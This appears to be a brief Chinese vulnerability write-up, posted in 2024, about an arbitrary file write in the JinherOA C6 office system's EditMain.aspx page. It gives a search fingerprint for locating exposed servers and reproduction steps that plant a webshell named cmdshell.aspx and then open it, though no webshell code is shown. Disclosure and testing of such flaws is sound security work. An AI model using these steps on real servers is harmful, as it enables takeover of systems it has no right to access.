JinherOA C6 EditMain.aspx 后台文件写入漏洞
# JinherOA C6 EditMain.aspx 后台文件写入漏洞
## 漏洞描述
JinherOA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限
## 漏洞影响
JinherOA C6...
JinherOA C6 EditMain.aspx 后台文件写入漏洞
漏洞描述
JinherOA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限
漏洞影响
JinherOA C6
网络测绘
app="Jinher网络-JinherOA"
漏洞复现
漏洞触发需要后台权限
访问漏洞点 /C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx
写入webshell代码保存
再访问 /C6/JHSoft.Web.Portal/Default/cmdshell.aspx
- 发表于 2024-07-12 18:44:15
- 阅读 ( 2270 )
- 分类:OA产品
带头大哥
456 篇文章